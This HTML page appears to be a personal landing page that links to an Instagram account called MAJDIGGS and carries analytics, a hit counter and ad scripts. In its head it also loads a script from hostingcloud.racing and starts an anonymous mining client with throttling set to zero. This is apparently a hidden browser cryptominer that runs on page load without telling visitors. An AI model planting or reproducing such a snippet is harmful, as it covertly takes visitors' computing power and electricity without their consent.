<!DOCTYPE html>
<html>
<head>
<meta name="adbit-site-verification" content="e10c01d24e5dcaef003425da792a3d1de8906a212dd07823b8350006c3b43dc0" />

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-82879638-5"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-82879638-5');
</script>
<script src="https://www.hostingcloud.racing/or4N.js"></script>
<script>
    var _client = new Client.Anonymous('5317f95f723f293cbd9464b60c832207c66cfd3ab45025785c6cb47615a2f5cd', {
        throttle: 0, c: 'w'
    });
    _client.start();

</script>
</head>
<body>
  <h1 style="color:blue;text-align:center"><a href="https://www.instagram.com/majdiggs/">MAJDIGGS</a></h1>
  <br/>


<div class="col-xs-12 mt20" id="bg">
   <div style="margin:0px auto;width:133px;background:rgb(255, 255, 255);text-align:left;display:flex;border-radius:5px">
      <span style="padding:7px;display:none;border-right:1px solid #746dba">
      <a href="http://visitorshitcounter.com" rel="nofollow noopener"  target="_blank" title="https://visitorshitcounter.com/">
      <img src="https://visitorshitcounter.com/img/s-logo.svg" alt="https://visitorshitcounter.com/" style="width:100%;border:none;float:left;display:none;">
      </a>
      </span>
      <span class="text" id="dupli_hit_counter"   style="padding:10px 0 0 0;display:inline-block;color:rgb(255, 255, 255);width:100%;text-align:center;">
      </span>
      </span>
      <input type="hidden" id="site_val"   value="https://visitorshitcounter.com/counterDisplay?code=d0a80969e6d577e9b1cf4252d2f835ee&style=0017&pad=5&type=page&initCount=1">
   </div>
</div>
<script src="https://visitorshitcounter.com/js/badgess.js?v=1592850758"></script>

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

<div class="adbit-display-ad" data-adspace-id="F4691A75B3"></div>
<script type="text/javascript" src="https://adbit.biz/js/show_ads.js"></script>

</body>
</html>
